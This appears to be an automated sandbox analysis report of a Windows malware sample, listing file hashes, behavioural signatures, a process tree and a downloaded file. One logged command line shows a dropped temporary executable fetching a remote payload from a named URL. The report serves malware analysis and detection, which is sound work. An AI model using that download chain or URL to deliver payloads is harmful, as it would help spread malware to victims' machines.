Analysis
- Max time kernel: 149s
- Max time network: 150s
- Platform: windows7_x64
- Resource: win7-20240221-en
- Resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
- Submitted: 05/03/2024, 04:29
Behavioral tasks
- behavioral1
  Sample: b3c826c8e7de52b473258d54d67b528e.exe
  Resource: win7-20240221-en
- behavioral2
  Sample: b3c826c8e7de52b473258d54d67b528e.exe
  Resource: win10v2004-20240226-en
General
- Target: b3c826c8e7de52b473258d54d67b528e.exe
- Size: 83KB
- MD5: b3c826c8e7de52b473258d54d67b528e
- SHA1: dac2de8157e88c90257a255e8840fa661897e1a7
- SHA256: 5ec3a4f34c759cc44406d8402bcb640667c80da262e6811ff95402e2b48a0458
- SHA512: 0a99c1b7711877cad92fa538db9a09f5eb36ea5c28885eb6a841d21cc32e7681f4da1b6b91e0c201dc82479b0c8d99ed3516fc978a8ecf2d687ecc5c3bc3c4a3
- SSDEEP: 1536:0VmNBnskjNwF4mchK5RF12Ma0gRke7jbXOwzWSP1HdPI88i2nJy+wZm:rN9NdmxP8RkCHBvPpmi2ncbs
Malware Config

Signatures
- Executes dropped EXE (1 IoC)
  PID   Process
  1984  A2157-tmp.eXe
- Loads dropped DLL (3 IoCs)
  PID   Process
  1640  b3c826c8e7de52b473258d54d67b528e.exe
  1640  b3c826c8e7de52b473258d54d67b528e.exe
  1640  b3c826c8e7de52b473258d54d67b528e.exe
- YARA rule matches (3 IoCs)
  Resource                                                                      YARA rule
  behavioral1/files/0x0007000000016cfe-4.dat                                    upx
  behavioral1/memory/1984-17-0x0000000000400000-0x0000000000424000-memory.dmp   upx
  behavioral1/memory/1984-19-0x0000000000400000-0x0000000000424000-memory.dmp   upx
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious use of WriteProcessMemory (4 IoCs)
  Description                        PID   Process                                procid_target
  PID 1640 wrote to memory of 1984   1640  b3c826c8e7de52b473258d54d67b528e.exe   28
  PID 1640 wrote to memory of 1984   1640  b3c826c8e7de52b473258d54d67b528e.exe   28
  PID 1640 wrote to memory of 1984   1640  b3c826c8e7de52b473258d54d67b528e.exe   28
  PID 1640 wrote to memory of 1984   1640  b3c826c8e7de52b473258d54d67b528e.exe   28
Processes
- C:\Users\Admin\AppData\Local\Temp\b3c826c8e7de52b473258d54d67b528e.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\b3c826c8e7de52b473258d54d67b528e.exe"
  PID: 1640
  Signatures: Loads dropped DLL; Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\A2157-tmp.eXe (child of PID 1640)
    Command line: "C:\Users\Admin\AppData\Local\Temp\A2157-tmp.eXe" http://downgosoft.com/drv32.data "C:\Users\Admin\AppData\Local\Temp\A2157-tmpa"
    PID: 1984
    Signatures: Executes dropped EXE
Network
Downloads
- Filesize: 36KB
  MD5: a6ef8e1067dae3cf7537712443bf3b77
  SHA1: 204b8a6402b415533540d0c2659c5722a21da8be
  SHA256: 2917964e199063cb0cd0bced5d1f7846edcb810fe02fff8f0b1dd053746cf229
  SHA512: 9662f18208b8a6c27a29e496b75d24ef9a910c20cd458fe8ea58458986253d3ff0a82e349cbfa804b52b3dd0913d995e737f740f48f1a16b8d2ff908ee9cc14a